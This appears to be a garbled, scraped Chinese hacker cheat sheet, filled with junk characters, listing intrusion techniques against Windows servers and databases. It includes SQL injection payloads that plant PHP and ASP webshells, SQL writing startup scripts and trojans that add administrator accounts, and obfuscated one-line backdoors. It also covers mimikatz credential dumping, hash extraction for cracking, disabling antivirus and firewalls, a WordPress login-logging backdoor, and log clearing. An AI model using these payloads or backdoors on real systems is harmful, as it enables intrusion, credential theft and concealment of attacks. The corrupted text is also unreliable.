# l! H$ K* e. q; horacle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解# s' [$ M' Q W
程序代码" ^2 g& U4 s, A' u
select username,password from dba_users; 3 R m+ b( b5 @0 h' C4 a5 }/ [/ j, W
. x9 s% \6 d2 T+ p7 |. Kmysql远程连接用户5 i* s& C+ f7 Z
程序代码 / Z0 V9 u( H- D; f7 p2 l$ C8 v0 F7 _) y- `
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme'; 6 q# V: M; Z: X t3 V# i |GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION1 }9 v7 w( X: t
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0# C. e# [$ k6 z( J
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;( p. q. i0 F/ l: r
0 U. \) b6 O# d$ _# K {2 G
& {9 I! P; M+ @) {% g, r8 t0 r H, }2 Y2 m; ]5 j& Z' l9 i1 D; @) P
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0' K( A; L* t& w+ a1 r' v
9 r0 ^& P# v0 ?9 Y
1.查询终端端口* t" }. E+ M( O# v( `6 Q4 [
s3 Y7 a2 J- V& |" Y
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 0 J# s- l- N! X6 w# T [5 E2 U g- D5 W+ ]4 r* J8 E
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"$ S1 |. Z/ {- @ m0 b
type tsp.reg4 _$ w9 i3 q, A3 P3 a6 \4 w
! c' Z- q) N0 c4 V& n: K1 G
2.开启XP&2003终端服务! [3 l8 N# I- _- N) k
+ R. K- k. W7 B5 a测试1:* f" v: g# d; U7 P# l2 J
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1 ) |8 Q* q9 {: E [# S ! t, |9 x0 q7 t: _% a/ M1 U* q测试2:$ |: E3 t! z% U6 ]9 Y( U8 N
$ E0 ~9 h) A k% ^create table dirs(paths varchar(100),paths1 varchar(100), id int) ! E: \. @* j- o* g 1 Z7 c0 ]& L/ Vdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--+ K8 Z, Z; H! Y- h/ u' D
- h" y; U5 m$ W% y/ b
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1/ a! u# l3 v1 o' C) }& G
* x: S) R0 }: d4 O U8 G
查看虚拟机中的共享文件:! u4 W1 j j9 [! |
在虚拟机中的cmd中执行 9 |( R4 Y: v3 u0 G\\.host\Shared Folders ' j+ r w' {9 T+ g 8 I9 E, r, C% v: \cmdshell下找终端的技巧 ! N/ H6 @) P5 z/ }+ C t3 H找终端: : s) {$ ~5 X8 d/ V2 s' R# ^1 H第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! , ^2 w' u. h3 @% o- T/ L6 G
而终端所对应的服务名为:TermService " [6 B8 D$ |( l, F9 Q1 M第二步:用netstat -ano命令,列出所有端口对应的PID值! ' I' p1 {2 ~) O. I. W/ B 找到PID值所对应的端口 : j$ V0 P6 v1 e+ {4 a/ b1 A2 z( F( c3 ^& j9 I [
查询sql server 2005中的密码hash. P1 K3 I! G9 F0 V$ \# u
SELECT password_hash FROM sys.sql_logins where name='sa' 6 w" I+ z4 n! B$ V0 k4 H" u5 TSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a ' u8 H" S; O% F* d* Qaccess中导出shell! V3 w) X0 J K* x& U/ }
5 e O9 Q" [) ^* N# H# p
中文版本操作系统中针对mysql添加用户完整代码:2 u! |; I" p* U% d
6 T* B/ \. Z9 i5 }; u6 U' Suse test; * E5 h# p: _8 bcreate table a (cmd text); " d" a3 v$ h1 \, T6 V! N5 [5 { Einsert into a values ("set wshshell=createobject (""wscript.shell"") " );1 }6 A3 }3 X+ B$ r4 |1 k- Z
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );* `, f" B) P: ]/ u
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );% W. A; |# I( v5 ^. D* p3 @/ j
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs"; 0 O5 Y K8 G) }3 v: tdrop table a; 7 X8 X: C0 u( Q9 u% J7 L/ O0 t3 j( Q! g( I5 P) o2 e
英文版本: + k6 @) r; d+ h' T; k8 E/ L: P7 \9 S) b3 s" ~. i
use test; 8 d. s# ?% I1 s* |$ Q! b8 dcreate table a (cmd text); ) p% w O& Z' iinsert into a values ("set wshshell=createobject (""wscript.shell"") " ); 1 ?* ]+ _ z) K7 Iinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );5 L7 \; L1 a' @4 f2 n
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );0 O! U( Y% H( j1 E: d
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs"; 8 g$ D" ^$ j/ t0 _drop table a;5 A5 A/ H6 E7 m6 c& ~; Q [
4 j% K/ k1 ^5 a' A* V. G$ g' k
create table a (cmd BLOB);9 y$ t C* q: m4 C
insert into a values (CONVERT(木马的16进制代码,CHAR));4 [) ^3 t$ U6 L# i7 @6 b1 ^
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe' 1 o8 ~! N6 [/ A0 Qdrop table a; 2 E$ O: L' ~, L4 v& [( L4 L' ]+ m% Y* ~0 d: m5 O' i
记录一下怎么处理变态诺顿 ' |% Z, F0 C }( r/ Z查看诺顿服务的路径+ u' k p0 {8 V6 I
sc qc ccSetMgr# {! i: d; L2 i4 ^( s
然后设置权限拒绝访问。做绝一点。。5 w4 j) n5 P- k5 q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system + p8 a: ~* z. {8 Ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"- n9 i) B5 V M+ B9 J7 [
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators. C& M7 G) v4 V, v0 g9 @2 T. c
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone5 O; H- E5 i* m4 X' l: G
9 U( P6 U2 }2 M1 @" c: ~% K0 G
然后再重启服务器 " z. |0 G B% A( t6 o, r- V4 Iiisreset /reboot ) J f9 |/ T' J, c. h! M2 S这样就搞定了。。不过完事后。记得恢复权限。。。。 8 D, x" d, P4 b" m4 J; fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F6 b/ [/ Z' y! S- T7 F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F " Z% c, X! T, a2 W" r( \cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F B- |7 T0 p k, j$ ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F+ u9 x' f/ B" B+ u L
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin: ~1 {" J" Q+ ]& Y
+ l% Y& s( C6 }+ _% _
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')9 [* W. L8 q2 R# u. z* n) ?0 K3 d
% n2 B4 T, I! _5 q2 Z
postgresql注射的一些东西/ O( h; D$ t$ F% I6 c0 c0 r1 G
如何获得webshell 5 `4 k* T- j' a4 shttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 2 S! h' q' G" O( K+ O http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 5 e5 o. p, S" [6 V' u& |4 } http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;5 R- T6 ` K. q
如何读文件3 X' v6 h" t1 N http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);4 t! V4 R+ p8 k) q/ @5 _ http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;( B( H2 ?; X, k& g http://127.0.0.1/postgresql.php?id=1;select * from myfile; $ a2 A$ z V: o; K2 z& j4 v8 ]5 `9 m0 q! P8 D! G% R x# S: Y
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。 # B8 I: ?1 c0 X' V- `当然,这些的postgresql的数据库版本必须大于8.X - `: K' c( Z. ^: T9 ?! o4 z创建一个system的函数: * s4 v- k1 L2 c: F8 \3 _CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT # ]4 I3 W+ B" u+ x6 f' N7 Y2 U: M0 m7 h4 G ]' @" V3 ]6 V
创建一个输出表: % ]" \. g# [$ G. t# h! xCREATE TABLE stdout(id serial, system_out text); B+ ]" |4 U6 c! q
7 [$ q0 J3 Q$ H% M& d+ \
执行shell,输出到输出表内:5 Y1 g* M4 N9 |3 B% B- n: a
SELECT system('uname -a > /tmp/test')5 I& u) W! a9 N6 q. |: e4 I3 [
& O* i' a2 s. B1 s' I5 Q/ C* M6 I
copy 输出的内容到表里面; $ s) f1 w b: N: R) k+ z# zCOPY stdout(system_out) FROM '/tmp/test'4 N! u2 M* \2 A* x
2 s& k% g. O8 E5 C$ J
从输出表内读取执行后的回显,判断是否执行成功 ; N. t0 L" P5 F2 J7 ]. `3 i$ ~ , c& `& b K! j$ ~' h6 PSELECT system_out FROM stdout+ t) Y/ A" x1 E1 W0 ~
下面是测试例子, e; I/ N5 l- `9 d+ u9 [4 _& e' |7 j
: W6 Z$ U/ u* z- _" h* ]
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- \" ]6 b! v1 U" ?1 k
' [8 Y" ^( ?- d! v* x3 M5 a' q
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C': N. T* z1 E9 D. S0 D
STRICT --$ B- \7 B3 ? ^
# C2 v$ u. q7 Q( j/ v- u/store.php?id=1; SELECT system('uname -a > /tmp/test') --6 |5 `" F& _! l. Z. W( E
7 M; Z# c- h( |0 a0 m; K
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --8 l0 Y7 [' }! M4 y# G
5 G$ w! o0 u% n8 Q' B: U
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--* l3 l& q$ j4 V1 V0 ^0 ]
net stop sharedaccess stop the default firewall' y. N N3 Z* H
netsh firewall show show/config default firewall2 h6 k g7 g& t
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall( B R/ P o0 V' `
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall : j7 ]) y) [8 o5 E% w: C修改3389端口方法(修改后不易被扫出)5 W$ b9 P7 M- O+ G) r. ]
修改服务器端的端口设置,注册表有2个地方需要修改& V, q. `1 q* M3 O
% Q$ H" K1 Y) X& P- g. f* ~. G[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]) ]1 o; ?! M1 B, E/ [$ `5 `$ z7 g
PortNumber值,默认是3389,修改成所希望的端口,比如6000 # K1 Q; h; G" P3 p+ b' d: H4 r( _( M
第二个地方: 5 D8 l, G+ j0 F6 Y2 [, {8 {[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] . I- r9 T6 {- {: {7 Z2 f5 O' u
PortNumber值,默认是3389,修改成所希望的端口,比如6000; ^) o8 ]+ F, s% Z: R# C$ e; M
, g; J! [5 p+ Q6 K: P
现在这样就可以了。重启系统就可以了7 x% E; ]7 O! J* }4 t3 d% d
/ H3 u P! b9 C1 v8 W//危险的include函数,直接编译任何文件为php格式运行6 I( j6 A* I' W7 W" ]
1 j: Q/ O+ |% F8 n% X$ v
3、1 p+ e! v* n9 Y. A! U2 y" G' B
5 o# O" p4 X$ Q8 A+ J6 x x$reg="c"."o"."p"."y"; 3 n% m+ ? g; O" k; x - t5 g8 J( r( D. n# e$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); ; j% ^- s h( r- R& G, t 7 q/ I+ r( `. z8 `$ N//重命名任何文件 : M) x, y; D6 L% g& l- Y; ? - y* ]& N& g% Q- M' [* k4、 ; u- |$ i; Y: x. w; ~7 m' @4 @$ ^/ }! Y2 ~% Z1 A9 f
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; * a; S. b' f% d" ^1 a+ e$ F J" _9 E. p
$gzid("/[discuz]/e",$_POST['h'],"Access");! e x9 o, z3 c* I% O; F
p/ }# F& L* k& y, m6 K5 s; m//菜刀一句话 7 [- F4 M" `8 f( W% `, u9 m$ r" m$ a! F4 C4 Z1 P& o$ B
5、include ($uid); . T; n- F$ N7 l5 J2 I * H9 a! T' O$ v1 a! ]0 l0 o& h0 `//危险的include函数,直接编译任何文件为php格式运行,POST 3 d5 ~! C. T' v7 \0 a/ v : Y. ` \! R. O Q 5 D; r& Y' q8 s* Y//gif插一句话8 H. [* | c/ n
+ u& E% ]- J6 x! {
6、典型一句话8 t* P& c7 c3 K8 D# r0 R, _
$ A7 V! {6 r) a( O8 T, b6 h程序后门代码" L$ O% J4 R; C- [* W* e+ K
<?php eval_r($_POST[sb])?>6 k) s3 l+ r f- u' d; x P3 A
程序代码# M. p* x z& n. d% z7 \2 g
<?php @eval_r($_POST[sb])?> 1 J- b! d9 a) U! Q//容错代码 9 ^% J! P i4 B7 Z- D6 I程序代码9 T- P; W6 m; S2 K# j
<?php assert($_POST[sb]);?>7 v$ I" ]0 }0 J8 a
//使用lanker一句话客户端的专家模式执行相关的php语句 " n& Y( X/ p6 r程序代码& h0 q8 a9 q7 [( }
<?$_POST['sa']($_POST['sb']);?> ( l! J4 c% e( ?. F. ^程序代码/ O+ ?6 k9 c+ Z' I, @
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>2 P/ M" y9 A \6 o
程序代码* K R# z7 _! B: U
<?php ; w( e% R4 o' X( O@preg_replace("/[email]/e",$_POST['h'],"error");( X" { u! x4 n
?>. e9 J* d+ x C0 W9 i$ u
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 ( }+ D* Z* O( Q9 x7 X程序代码 4 G/ ~; y! ]8 \7 N<O>h=@eval_r($_POST[c]);</O>, G! o" e" B- r/ r2 z! y
程序代码3 I3 A( U6 n; `( }: r5 k( @
<script language="php">@eval_r($_POST[sb])</script> 0 O& k2 a: V9 f% A. J' ~) J//绕过<?限制的一句话 4 r2 e8 j2 q# [" I( n0 b+ Y0 F/ Y3 G, f5 m http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip ) s o; w, Z# `9 z- ?& [: M' h4 B详细用法:$ J6 n+ U- x% a( h1 k, e0 N( {& J6 B5 e
1、到tools目录。psexec \\127.0.0.1 cmd6 J! c5 r3 n( d& ^6 J
2、执行mimikatz( n+ w+ \$ z# R2 V; W1 B! ~& P4 `6 X
3、执行 privilege::debug % x" S0 t! l+ l) k9 D4、执行 inject::process lsass.exe sekurlsa.dll 5 [: F1 X- G5 s2 S! d# k5、执行@getLogonPasswords- L4 ]" `1 e& y/ k9 t
6、widget就是密码 9 F& r" R& h( ^4 h! J9 Q. G7、exit退出,不要直接关闭否则系统会崩溃。7 _) B6 L1 ^! ~1 w
7 D3 P2 }3 R6 u& ^8 V http://www.monyer.com/demo/monyerjs/ js解码网站比较全面 5 t5 a: I; O( n6 w% C 3 |- \, V: A- m: F& B4 r/ q# v4 O自动查找系统高危补丁 & c6 x& n% O* y/ k% |& n# M8 csysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt ! ~5 F; Y4 w+ o1 [" L e5 _ d |# ^ K; @. r+ T4 A2 }8 P
突破安全狗的一句话aspx后门8 A2 _* m6 j! G. @- Q) c# n( A
<%@ Page Language="C#" ValidateRequest="false" %> 4 d! v8 U+ }& e! q, j2 X+ I<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>: s0 i1 L- f7 q# e
webshell下记录WordPress登陆密码 0 V {" v( f/ k# iwebshell下记录Wordpress登陆密码方便进一步社工 & O- V' u; I4 @$ s在文件wp-login.php中539行处添加: ! ?; G% m8 n9 L// log password 7 e7 @% X( Q7 a: V$log_user=$_POST['log'];, l2 P: Z9 k5 e) N4 z9 S
$log_pwd=$_POST['pwd'];, h* f6 U' A& W1 O, b" E) z$ v; e- n
$log_ip=$_SERVER["REMOTE_ADDR"]; % y; I7 k; Y+ }9 \$txt=$log_user.’|’.$log_pwd.’|’.$log_ip; & r% `5 B/ t" r" W, Y- y$txt=$txt.”\r\n”; : O) c& M0 ^0 e* F5 h0 M% [& [if($log_user&&$log_pwd&&$log_ip){ ( H, t7 Q" d5 j' y& G: }2 \@fwrite(fopen(‘pwd.txt’,”a+”),$txt); 8 J. J3 m9 a, V+ u. I6 `4 |}' b0 I$ f- G* J2 F4 V! ^
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。 j" t: Y# I7 H! n! q
就是搜索case ‘login’) N* ~ _1 L8 R, Z2 T
在它下面直接插入即可,记录的密码生成在pwd.txt中, ! T. B" ^ S" z9 D8 b其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录 * t# ^* n9 J2 R利用II6文件解析漏洞绕过安全狗代码: " E' O' X5 L: e. b& b) a;antian365.asp;antian365.jpg) {4 w/ {2 @! f7 ?! I+ t
4 F6 _7 ^& o& \' n各种类型数据库抓HASH破解最高权限密码!% B; B# \% z' t! Q& q
1.sql server2000 7 e- d1 o. ]% R4 rSELECT password from master.dbo.sysxlogins where name='sa'& W4 m5 n+ Y6 f: b
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503415 M6 X$ r5 t2 u
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A' p/ M7 z1 v& c1 V; b9 \
+ F2 b( @' B& }, Q- Y0×0100- constant header) K+ w/ n* K* Q* c/ K3 K! \- l5 q( T' S
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash' I9 l, j) u S" a2 c
crack the upper case hash in ‘cain and abel’ and then work the case sensitive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100- constant header
993BF231-salt I7 \! G# }' \
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash D7 R; f8 _, `1 `crack case sensitive hash in cain, try brute force and dictionary based attacks.# j% c, r8 p: E" ]
0 j) w" B) S4 j$ g. [* c. w9 T
update:- following bernardo’s comments:- " [: ^, E+ ~9 t8 R Guse function fn_varbintohexstr() to cast password in a hex string. 6 |# n9 k3 r; J7 de.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins; N$ Y# y8 S& U, d$ D* b% R
. e: H: j* i2 ]3 s9 s# h( z GMYSQL:-4 ?+ G- v6 X2 a! [. t& a1 s8 f) x
% b( ]6 P; @! a9 m9 P4 N9 j& p
In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
1 W% Z5 m# U Kmysql> SELECT PASSWORD(‘mypass’);5 `$ p* A! L* y4 K; x
+——————————————-+ ; k( u4 K" U v9 U1 T$ V& J| PASSWORD(‘mypass’) |( \$ l# g! @8 H$ j
+——————————————-+ / c! D5 `8 b$ @| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |: S# j& _9 H) }5 ?" w
+——————————————-+ % w) n& m# _" A* h8 }- H* X6 b$ |9 N+ D: e
Select user, password from mysql.user; d& M+ Y# v* f8 U/ r$ a
The hashes can be cracked in ‘cain and abel’# A- w! P/ Q4 f+ k
0 J3 y* o; g+ V3 jPostgres:- 5 b2 i; B4 X. M8 r2 Z! `Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”) 0 i+ P- q: |2 U2 ` c, cselect usename, passwd from pg_shadow; 3 U/ ~. T. W: u7 z( c& O0 Pusename | passwd6 `% l1 k `/ T2 ]
——————+————————————- - \5 g3 U5 ?* V. U$ F, htestuser | md5fabb6d7172aadfda4753bf0507ed4396* N* u8 f$ @& K/ ~4 C- R
use mdcrack to crack these hashes:- 6 Q/ M* t* H. L) A. B$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43969 i, C$ Y2 r( s# A
: W; d9 _7 a6 P9 a W% R3 I
Oracle:- H, X0 W$ N- Y) T. e) V! B
select name, password, spare4 from sys.user$- ~% u, _7 m1 t3 \* u
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g' @, t- G9 H @' c
More on Oracle later, i am a bit bored…. : v3 Z* m. k# }; \+ `0 B* ]7 Q1 o 8 v, [4 q1 W4 O$ t' I: w) Q, {: C- B0 d, r+ f5 K% d
在sql server2005/2008中开启xp_cmdshell / V, A' G7 W! e4 [0 v% [( k! S5 u-- To allow advanced options to be changed. ) A4 u/ X3 W3 M# C }EXEC sp_configure 'show advanced options', 1% D& r- `* N7 \
GO ) F# r! S! E2 g; W \4 h-- To update the currently configured value for advanced options./ A" \0 y) Z4 y6 v D' O+ [- C
RECONFIGURE ( T5 S% c9 v4 z) B+ B, {. q3 |6 h1 eGO % R% y# D9 \: n" M. @! K* F. l' ]-- To enable the feature. - F6 _* ^1 Y- S" X( _3 R* B. AEXEC sp_configure 'xp_cmdshell', 1+ p- y) l7 f1 o7 g
GO " S+ m& _: g1 B) m: q-- To update the currently configured value for this feature.2 P% L4 @/ S) M Y9 O$ s7 J5 f1 j# }
RECONFIGURE# D' x; D* x3 E" q7 r
GO 5 P) N G% D' HSQL 2008 server日志清除,在清楚前一定要备份。 & Y/ ?3 {' B3 {2 X6 X6 o如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除: 4 k" ~ `0 R( {" v7 B$ hX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin 4 k V c, |$ ]7 ~9 N* y" g( o; [: h3 g4 o5 y+ A" }. z. P6 j
对于SQL Server 2008以前的版本: 6 N d, x" r* x: F3 KSQL Server 2005: ! z7 G, G- {* I, C) A删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat( r& f! j# q1 A2 K4 @2 {- I- [& a S
SQL Server 2000: ! w, j' e" e4 c7 `6 G清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。. Q; L7 T+ L# V9 [; c& i1 E/ s' h
9 }, x$ Q9 t/ w% c1 I& k